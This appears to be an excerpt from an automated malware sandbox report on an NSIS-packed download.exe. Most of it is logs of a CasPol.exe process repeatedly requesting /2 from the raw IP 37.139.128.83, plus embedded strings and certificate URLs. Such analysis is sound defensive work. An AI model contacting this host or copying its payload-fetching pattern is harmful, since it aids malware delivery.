          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:23:31 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:23:41 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:23:51 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:24:01 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:24:11 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:24:22 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2$2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2-2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/262hk
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2Data
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2M
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2R2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2W7
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2e
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2gsLMEM8
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2k
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/l
          Source: lang-1032.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: lang-1032.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: lang-1032.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: download.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: download.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: lang-1032.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: lang-1032.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: lang-1032.dll.2.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: download.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: download.exeString found in binary or memory: http://s.symcd.com06
          Source: download.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: download.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: download.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: lang-1032.dll.2.drString found in binary or memory: http://www.avast.com0/
          Source: lang-1032.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: download.exeString found in binary or memory: https://d.symcb.com/cps0%
          Source: download.exeString found in binary or memory: https://d.symcb.com/rpa0
          Source: download.exeString found in binary or memory: https://d.symcb.com/rpa0.
          Source: lang-1032.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004051E2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004051E2
          Source: download.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
